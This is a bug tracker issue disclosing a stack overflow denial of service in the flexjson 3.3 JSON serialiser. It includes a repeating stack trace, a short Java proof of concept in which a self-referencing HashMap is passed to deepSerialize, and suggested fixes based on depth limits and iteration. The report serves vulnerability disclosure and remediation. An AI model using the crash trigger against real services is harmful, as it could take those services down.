Menu

#50 Stack overflow error caused by flexjson serialization Map

2.0.0
open
nobody
None
5
2023-06-08
2023-06-08
guo yifan
No

Stack overflow error caused by flexjson serialization Map

Description

flexjson before v3.3 was discovered to contain a stack overflow via the map parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string.

Error Log

Exception in thread "main" java.lang.StackOverflowError
    at java.base/java.lang.AbstractStringBuilder.append(AbstractStringBuilder.java:631)
    at java.base/java.lang.StringBuilder.append(StringBuilder.java:218)
    at flexjson.StringBuilderOutputHandler.write(StringBuilderOutputHandler.java:38)
    at flexjson.JSONContext.writeQuoted(JSONContext.java:346)
    at flexjson.JSONContext.writeName(JSONContext.java:231)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:47)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)

PoC

<dependency>
    <groupId>net.sf.flexjson</groupId>
    <artifactId>flexjson</artifactId>
    <version>3.3</version>
</dependency>

import flexjson.JSONSerializer;

import java.util.HashMap;

public class PoC2 {
    public static void main(String[] args) {
        HashMap<String,Object> map=new HashMap<>();
        map.put("t",map);
        String s = new JSONSerializer().deepSerialize(map);
    }
}

Rectification Solution

  1. Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b)

  2. Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.((https://github.com/google/gson/commit/2d01d6a20f39881c692977564c1ea591d9f39027))

References

  1. https://github.com/jettison-json/jettison/issues/52
  2. https://github.com/jettison-json/jettison/pull/53/files

Discussion

Log in to post a comment.

MongoDB Logo MongoDB